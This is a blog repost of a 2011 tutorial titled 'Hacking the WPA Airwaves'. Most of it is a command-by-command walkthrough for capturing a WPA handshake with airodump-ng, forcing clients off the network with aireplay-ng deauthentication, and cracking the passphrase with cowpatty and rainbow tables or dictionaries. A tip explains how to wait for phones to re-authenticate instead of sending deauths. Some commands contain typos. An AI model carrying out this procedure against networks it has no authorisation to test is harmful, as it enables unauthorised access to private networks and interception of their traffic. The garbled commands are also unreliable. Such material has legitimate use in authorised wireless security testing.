Hacking the WPA Airwaves

I recently picked up the book Hacking Exposed Wireless 2nd Ed , looks like an awesome book and I cant wait to start testing some of the fun stuff that Joshua , Johnny, and Vincent has lineup. Today while following a discussion in the Pauldotcom IRC room someone pointed me to this guide and I felt it was worth a re-post enjoy.

Hacking the WPA Airwaves

by Mark Bennett, infosecisland.com
May 16th 2011

It is interesting how many people believe that their wireless is secure because they are using WPA.

Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table.

The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs, the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)

kismet -c wlan0

  • close console window to see collection of packets
  • use alt + k to get to top pull down menu’s, turn on ability to see type of access points bsid and guess at IP address, channel #

Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c –bssid -w wlan0


airodump-ng -c 9 –bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0  * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-conect from the target (see the Note below)

aireplay-ng -a -c wlan0


airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the traffic in the D-Link01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r -d -s


cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s


cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has a lot of cell phones like the iPhone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless Ethernet card has a wake-up when the screen is activated.

So you don’t need to send de-auth all you got to do is hang around long enough for someone to touch their iPhone or whatever cell and have it wake up it’s wireless and re-auth to the network, in other words there is the weakest link! — LOL!

Happy Cracking…

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

Cross-posted from Darknet Consulting

Original Page: https://www.infosecisland.com/blogview/13748-Hacking-the-WPA-Airwaves.html